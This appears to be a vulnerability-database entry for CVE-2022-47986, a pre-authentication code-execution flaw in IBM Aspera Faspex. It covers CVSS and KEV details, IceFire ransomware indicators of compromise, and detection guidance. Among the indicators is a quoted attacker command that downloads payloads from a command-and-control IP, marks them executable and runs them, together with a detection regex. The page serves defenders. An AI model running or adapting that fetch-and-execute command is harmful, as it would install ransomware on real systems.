cbcvebase.
CVE-2022-47986
published 2023-02-17

CVE-2022-47986: IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw…

PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2023-03-14
Exploited in the wild
EPSS
99.97%
100.0th percentile
IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.

Affected

3 ranges
VendorProductVersion rangeFixed in
ibmaspera_faspex<= 4.4.1
ibmaspera_faspex
ibmaspera_faspex

Detection & IOCsextracted from sources · hover to see the quote

hashb676c38d5c309b64ab98c2cd82044891134a9973
ip159.65.217.216
urlhxxp[://]159.65.217.216:8080/demo
urlhxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire
domain7kstc545azxeahkduxmefgwqkrrhq3mzohkzqvrv7aekob7z3iwkqvyd.onion
cookie_aspera_faspex_session
path/opt/aspera/faspex
filenameiFire-readme.txt
commandsh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo
port8080
otherhttp:\/\/159\.65\.217\.216:8080\/\(([a-z]+\.){2}([a-z]+)|^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}\)\/iFire
otherMIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+\nZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w\nFadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP\nc0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE\nj6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK\ndvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB
  • IceFire deletes itself post-encryption; monitor for self-deletion of recently-downloaded ELF binaries on Linux servers.
  • Detect exploitation of CVE-2022-47986 by monitoring for unusual outbound wget/curl requests originating from the IBM Aspera Faspex process, particularly to port 8080.
  • Payloads are downloaded to /opt/aspera/faspex; alert on new executable files written to this path followed by chmod +x and execution.
  • Use the provided regex to detect IceFire payload download URLs in proxy/network logs; wildcard the C2 IP in case of pivot.
  • Presence of the session cookie '_aspera_faspex_session' in traffic to/from 159.65.217.216 indicates attacker reconnaissance or exploitation of a vulnerable Aspera Faspex instance.
  • IceFire skips files with .sh and .cfg extensions and avoids system paths (/boot, /dev, /etc, /lib, /proc, /sys, /usr, /var, /run); focus encryption detection on /home, /mnt, /media, /share, /srv.
  • CVE-2022-47986 exploitation involves a specially crafted obsolete API call; monitor Aspera Faspex web logs for requests to deprecated API endpoints.
  • ·The IceFire binary was undetected at time of reporting (0/61 VirusTotal engines), largely due to statically linked OpenSSL functions inflating the binary; signature-based AV is insufficient for detection.
  • ·The /srv directory exclusion can be selectively overridden by the attacker; do not rely on default exclusion lists as a containment assumption.
  • ·The embedded path referencing user 'Jhone' may be an OpenSSL library artifact rather than a developer indicator; do not treat it as a reliable attribution signal.
  • ·The vulnerability is pre-authentication RCE, meaning no user credentials are required for exploitation; perimeter controls relying on authentication are ineffective.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.